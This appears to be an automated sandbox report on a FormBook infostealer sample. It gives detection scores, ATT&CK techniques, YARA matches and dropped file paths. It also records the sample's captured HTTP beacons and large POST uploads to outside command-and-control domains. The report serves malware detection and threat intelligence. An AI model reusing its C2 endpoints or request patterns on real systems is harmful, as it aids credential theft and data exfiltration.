
Analysis Report ACre0O2rKa.bin

Overview

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: FormBook

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Execution through Module Load1; Exploitation for Client Execution1; Graphical User Interface1; Scheduled Task; Command-Line Interface; Graphical User Interface
Persistence: Registry Run Keys / Startup Folder1; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service
Privilege Escalation: Process Injection512; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service
Defense Evasion: Masquerading1; Software Packing11; Virtualization/Sandbox Evasion2; Process Injection512; Deobfuscate/Decode Files or Information1; Obfuscated Files or Information3
Credential Access: Credential Dumping1; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force
Discovery: Virtualization/Sandbox Evasion2; Process Discovery2; Security Software Discovery221; Remote System Discovery1; File and Directory Discovery2; System Information Discovery12
Lateral Movement: Remote File Copy1; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software
Collection: Email Collection1; Man in the Browser1; Data from Local System1; Input Capture; Data Staged; Screen Capture
Exfiltration: Data Encrypted1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Standard Cryptographic Protocol1; Remote File Copy1; Standard Non-Application Layer Protocol3; Standard Application Layer Protocol13; Standard Cryptographic Protocol; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Signature Overview

AV Detection:

 Antivirus detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Avira: detection malicious, Label: TR/Injector.jjaxf
 Antivirus detection for sample
  Source: ACre0O2rKa.exe Avira: detection malicious, Label: TR/Injector.jjaxf
 Multi AV Scanner detection for domain / URL
  Source: http://www.molestuk.com/un/ Virustotal: Detection: 7%
 Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Virustotal: Detection: 74%
  Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe ReversingLabs: Detection: 82%
 Multi AV Scanner detection for submitted file
  Source: ACre0O2rKa.exe Virustotal: Detection: 74%
  Source: ACre0O2rKa.exe ReversingLabs: Detection: 82%
 Yara detected FormBook
  Source: Yara match File source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY
  Source: Yara match File source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY
  Source: Yara match File source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY
  Source: Yara match File source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY
  Source: Yara match File source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE
  Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE
  Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match File source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE
  Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE
  Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE
  Source: Yara match File source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE
  Source: Yara match File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE
  Source: Yara match File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Joe Sandbox ML: detected
 Machine Learning detection for sample
  Source: ACre0O2rKa.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file
  Source: 0.2.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 1.2.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 13.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 20.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 14.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 15.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 0.0.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 17.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 14.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 13.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 17.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 16.0.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 1.0.ACre0O2rKa.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
  Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

 Found inlined nop instructions (likely shell or obfuscated code)
  Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 4x nop then pop edi 1_2_004140C3
  Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop edi 3_2_003D40C3

Networking:

 HTTP GET or POST without a user agent
  Source: global traffic HTTP traffic detected:
   GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1
   Host: www.transferas.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
   Data Ascii:
  Source: global traffic HTTP traffic detected:
   GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1
   Host: www.websitenhatrang.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
   Data Ascii:
  Source: global traffic HTTP traffic detected:
   GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1
   Host: www.travelbytravant.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
   Data Ascii:
  Source: global traffic HTTP traffic detected:
   GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1
   Host: www.starsaunainstallations.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
   Data Ascii:
 IP address seen in connection with other malware
  Source: Joe Sandbox View IP Address: 209.99.64.55
  Source: Joe Sandbox View IP Address: 23.20.239.12
 Internet Provider seen in connection with other malware
  Source: Joe Sandbox View ASN Name: unknown
  Source: Joe Sandbox View ASN Name: unknown
 Uses a known web browser user agent for HTTP communication
  Source: global traffic HTTP traffic detected:
   POST /un/ HTTP/1.1
   Host: www.websitenhatrang.com
   Connection: close
   Content-Length: 190296
   Cache-Control: no-cache
   Origin: http://www.websitenhatrang.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.websitenhatrang.com/un/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
   Data Raw:
  Source: global traffic HTTP traffic detected:
   POST /un/ HTTP/1.1
   Host: www.travelbytravant.com
   Connection: close
   Content-Length: 190296
   Cache-Control: no-cache
   Origin: http://www.travelbytravant.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.travelbytravant.com/un/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
   Data Raw:
  Source: global traffic HTTP traffic detected:
   POST /un/ HTTP/1.1
   Host: www.starsaunainstallations.com
   Connection: close
   Content-Length: 190296
   Cache-Control: no-cache
   Origin: http://www.starsaunainstallations.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.starsaunainstallations.com/un/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
   Data Raw:
 Downloads files from webservers via HTTP
 Performs DNS lookups
  Source: unknown DNS traffic detected: queries for: www.vrtravelers.net
 Posts data to webserver
  Source: unknown HTTP traffic detected:
   POST /un/ HTTP/1.1
   Host: www.websitenhatrang.com
   Connection: close
   Content-Length: 190296
   Cache-Control: no-cache
   Origin: http://www.websitenhatrang.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.websitenhatrang.com/un/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
   Data Raw:
 Urls found in memory or binary data

E-Banking Fraud:

 Yara detected FormBook

System Summary:

 Detected FormBook malware
  Source: C:\Windows\SysWOW64\WWAHost.exe Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.ini
  Source: C:\Windows\SysWOW64\WWAHost.exe Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrf.ini
  Source: C:\Windows\SysWOW64\WWAHost.exe Dropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrv.ini
 Malicious sample detected (through community Yara rule)
  Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
  Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
  Source:
0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.1229429028.00000000038EF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY Matched rule: 
autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC 
Incident Response Group Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE Matched rule: detect 
Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Contains functionality to call native functions
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: String function: 06DFB0E0 appears 176 times
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: String function: 06E4DDE8 appears 44 times
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: String function: 06E85110 appears 38 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0343DDE8 appears 48 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 033EB0E0 appears 176 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 03475110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: String function: 06E45110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: String function: 06DBB0E0 appears 176 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: String function: 06E0DDE8 appears 48 times
PE file contains strange resources
Source: ACre0O2rKa.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ACre0O2rKa.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5jd0x8e0uzsd8l.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5jd0x8e0uzsd8l.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name differs from the original file name gathered from version info
Source: ACre0O2rKa.exe, 00000000.00000002.579024409.0000000000492000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000000.00000002.579614105.00000000020D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs ACre0O2rKa.exe
